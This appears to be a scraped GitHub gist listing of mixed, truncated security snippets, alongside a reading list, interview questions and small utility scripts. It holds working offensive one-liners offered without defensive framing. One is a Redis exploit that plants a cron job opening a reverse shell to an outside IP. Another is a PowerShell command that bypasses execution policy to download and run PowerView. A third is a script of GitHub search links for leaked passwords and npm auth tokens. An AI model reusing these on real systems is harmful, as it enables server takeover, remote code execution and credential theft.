- chime:createapikey
- codepipeline:pollforjobs
- cognito-identity:getopenidtoken
- cognito-identity:getopenidtokenfordeveloperidentity
- cognito-identity:getcredentialsforidentity
- connect:getfederationtoken
- connect:getfederationtokens
- ecr:getauthorizationtoken
- [gamelift:requestuploadcredentials](https://docs.aws.amazon.com/gamelift/latest/apireference/API_Re
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
From: http://redteams.net/bookshelf/ | |
Techie | |
Unauthorised Access: Physical Penetration Testing For IT Security Teams by Wil Allsopp. | |
Social Engineering: The Art of Human Hacking by Christopher Hadnagy | |
Practical Lock Picking: A Physical Penetration Tester's Training Guide by Deviant Ollam | |
The Art of Deception: Controlling the Human Element of Security by Kevin Mitnick | |
Hacking: The Art of Exploitation by Jon Erickson and Hacking Exposed by Stuart McClure and others. | |
Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning by Fyodor | |
The Shellcoder's Handbook: Discovering and Exploiting Security Holes by several authors |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
1. What is information security and how is it achieved? | |
2. What are the core principles of information security? | |
3. What is non-repudiation (as it applies to IT security)? | |
4. What is the relationship between information security and data availability? | |
5. What is a security policy and why do we need one? | |
6. What is the difference between logical and physical security? Can you give an example of both? | |
7. What’s an acceptable level of risk? | |
8. What are the most common types of attacks that threaten enterprise data security? | |
9. What is the difference between a threat and a vulnerability? | |
10. Can you give me an example of common security vulnerabilities? |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Veil-Framework/PowerTools/master/PowerView/powerview.ps1'); Get-NetDomain" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# gcloud auth activate-service-account --key-file=85.json | |
# gcloud projects list | |
project="my-project" | |
space="" | |
echo "gcloud auth list" | |
gcloud auth list | |
echo -e "$space" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
redis-cli flushall | |
echo -e "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/114.114.114.114/53 0>&1\n\n"|redis-cli -x set 1 | |
redis-cli config set dir /var/spool/cron/ | |
redis-cli config set dbfilename root | |
redis-cli save | |
from https://phpinfo.me/2016/07/07/1275.html |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
//from: https://github.com/rathergood/Crypto-Currency-Price/blob/master/ccprice | |
//returns price (or other info) of cryptocurrency from coinmarketcap api. | |
//takes two parameters, the name of the cryptocurrency and info that you want returned about the cc | |
//example: =ccprice("ethereum", "USD") | |
//example2 =ccprice("ethereum", "24h_volume_usd") | |
function ccprice(name, currency) | |
{ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
__author__ = 'srv' | |
import smtplib | |
from email.mime.multipart import MIMEMultipart | |
from email.mime.text import MIMEText | |
from email.mime.application import MIMEApplication | |
username = '' # Email Address from the email you want to send an email | |
password = '' # Password | |
server = smtplib.SMTP('') |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
RSA 2017 DevOOPS: Attacks And Defenses For DevOps Toolchains Talk Links SessionID: HTA-W02 | |
https://www.slideshare.net/chrisgates/devoops-attacks-and-defenses-for-devops-toolchains | |
Recording of talk from CERN | |
https://indico.cern.ch/event/622483/ (click the recording button) | |
Past talks: | |
http://www.slideshare.net/KenJohnson61/aws-surival-guide |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
echo "" | |
echo "************ Github Dork Links (must be logged in) *******************" | |
echo "" | |
echo " password" | |
echo "https://github.com/search?q=%22$1%22+password&type=Code" | |
echo "https://github.com/search?q=%22$without_suffix%22+password&type=Code" | |
echo "" | |
echo " npmrc _auth" |
NewerOlder